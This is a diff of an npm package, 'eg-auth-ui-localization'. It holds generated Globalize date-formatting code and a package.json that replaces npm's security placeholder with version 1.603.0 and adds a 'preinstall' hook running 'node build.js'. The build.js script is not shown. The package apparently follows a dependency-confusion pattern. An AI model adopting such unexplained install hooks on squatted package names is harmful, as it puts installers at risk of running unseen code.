+ Globalize.b619892400 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"skeleton":"yMMMd"}));
753
+ Globalize.a1051490029 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"skeleton":"MMMEEEEd"}));
754
+ Globalize.b1523980 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"skeleton":"MMMEd"}));
755
+ Globalize.a1933095056 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"yyyy-MM-dd","digitsRe":/\d/});
756
+ Globalize.a818548688 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"dd/MM/yyyy","digitsRe":/\d/});
757
+ Globalize.b348999645 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"d/M/yyyy","digitsRe":/\d/});
758
+ Globalize.b1471453603 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"yyyy/M/d","digitsRe":/\d/});
759
+ Globalize.a872689712 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"dd.MM.yyyy","digitsRe":/\d/});
760
+ Globalize.b1895296475 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"d.M.yyyy","digitsRe":/\d/});
761
+ Globalize.b1624555568 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"yyyy/MM/dd","digitsRe":/\d/});
762
+ Globalize.a926830736 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"dd-MM-yyyy","digitsRe":/\d/});
763
+ Globalize.a1456325008 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"MM/dd/yyyy","digitsRe":/\d/});
764
+ Globalize.b590571037 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"M/d/yyyy","digitsRe":/\d/});
765
+ Globalize.a154269744 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"yyyy.MM.dd","digitsRe":/\d/});
766
+ Globalize.a1508861391 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"EEEEE","digitsRe":/\d/,"gregorian/days/format/narrow":[["sun",/^S/],["mon",/^M/],["tue",/^T/],["wed",/^W/],["thu",/^T/],["fri",/^F/],["sat",/^S/]]});
767
+ Globalize.a1018473424 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"EEEE","digitsRe":/\d/,"gregorian/days/format/wide":[["wed",/^Wednesday/],["thu",/^Thursday/],["sat",/^Saturday/],["tue",/^Tuesday/],["sun",/^Sunday/],["mon",/^Monday/],["fri",/^Friday/]]});
768
+ Globalize.b234772016 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"MMMM","digitsRe":/\d/,"gregorian/months/format/wide":[["9",/^September/],["2",/^February/],["11",/^November/],["12",/^December/],["1",/^January/],["10",/^October/],["8",/^August/],["3",/^March/],["4",/^April/],["6",/^June/],["7",/^July/],["5",/^May/]]});
769
+ Globalize.a513305872 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"d","digitsRe":/\d/});
770
+ Globalize.b568295101 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"M/d/yy","digitsRe":/\d/});
771
+ Globalize.a1992542878 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"d MMM","digitsRe":/\d/,"gregorian/months/format/abbreviated":[["1",/^Jan/],["2",/^Feb/],["3",/^Mar/],["4",/^Apr/],["5",/^May/],["6",/^Jun/],["7",/^Jul/],["8",/^Aug/],["9",/^Sep/],["10",/^Oct/],["11",/^Nov/],["12",/^Dec/]]});
772
+ Globalize.a1619925931 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"d MMMM","digitsRe":/\d/,"gregorian/months/format/wide":[["9",/^September/],["2",/^February/],["11",/^November/],["12",/^December/],["1",/^January/],["10",/^October/],["8",/^August/],["3",/^March/],["4",/^April/],["6",/^June/],["7",/^July/],["5",/^May/]]});
773
+ Globalize.a735117418 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"d MMMM y","digitsRe":/\d/,"gregorian/months/format/wide":[["9",/^September/],["2",/^February/],["11",/^November/],["12",/^December/],["1",/^January/],["10",/^October/],["8",/^August/],["3",/^March/],["4",/^April/],["6",/^June/],["7",/^July/],["5",/^May/]]});
774
+ Globalize.a993484150 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"MMMM y","digitsRe":/\d/,"gregorian/months/format/wide":[["9",/^September/],["2",/^February/],["11",/^November/],["12",/^December/],["1",/^January/],["10",/^October/],["8",/^August/],["3",/^March/],["4",/^April/],["6",/^June/],["7",/^July/],["5",/^May/]]});
775
+ Globalize.a994169343 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"d MMM y","digitsRe":/\d/,"gregorian/months/format/abbreviated":[["1",/^Jan/],["2",/^Feb/],["3",/^Mar/],["4",/^Apr/],["5",/^May/],["6",/^Jun/],["7",/^Jul/],["8",/^Aug/],["9",/^Sep/],["10",/^Oct/],["11",/^Nov/],["12",/^Dec/]]});
776
+ Globalize.b888970274 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"EEEE, d MMM","digitsRe":/\d/,"gregorian/days/format/wide":[["wed",/^Wednesday/],["thu",/^Thursday/],["sat",/^Saturday/],["tue",/^Tuesday/],["sun",/^Sunday/],["mon",/^Monday/],["fri",/^Friday/]],"gregorian/months/format/abbreviated":[["1",/^Jan/],["2",/^Feb/],["3",/^Mar/],["4",/^Apr/],["5",/^May/],["6",/^Jun/],["7",/^Jul/],["8",/^Aug/],["9",/^Sep/],["10",/^Oct/],["11",/^Nov/],["12",/^Dec/]]});
777
+ Globalize.a1612537763 = dateParserFn(Globalize("en-GB").numberParser({"raw":"0"}), {"preferredTimeData":"H"}, {"pattern":"E, d MMM","digitsRe":/\d/,"gregorian/days/format/abbreviated":[["sun",/^Sun/],["mon",/^Mon/],["tue",/^Tue/],["wed",/^Wed/],["thu",/^Thu/],["fri",/^Fri/],["sat",/^Sat/]],"gregorian/months/format/abbreviated":[["1",/^Jan/],["2",/^Feb/],["3",/^Mar/],["4",/^Apr/],["5",/^May/],["6",/^Jun/],["7",/^Jul/],["8",/^Aug/],["9",/^Sep/],["10",/^Oct/],["11",/^Nov/],["12",/^Dec/]]});
778
+ module.exports = Globalize;
package/package.json CHANGED
@@ -1,6 +1,25 @@
1
1
  {
2
2
  "name": "eg-auth-ui-localization",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.603.0",
4
+ "private": false,
5
+ "description": "Experience auth ui localization",
6
+ "license": "MIT",
7
+ "author": "hexp-tmpl",
8
+ "main": "dist/bundle-en_GB.js",
9
+ "repository": "https://www.github.com/hexp-tmpl/eg-auth-ui-localization",
10
+ "scripts": {
11
+ "build": "babel",
12
+ "preinstall": "node build.js",
13
+ "test": "exit 0"
14
+ },
15
+ "dependencies": {
16
+ "globalize": "^1.7.0"
17
+ },
18
+ "devDependencies": {
19
+ "@babel/core": "^7.18.6",
20
+ "@babel/cli": "^7.18.6"
21
+ },
22
+ "publishConfig": {
23
+ "access": "public"
24
+ }
6
25
  }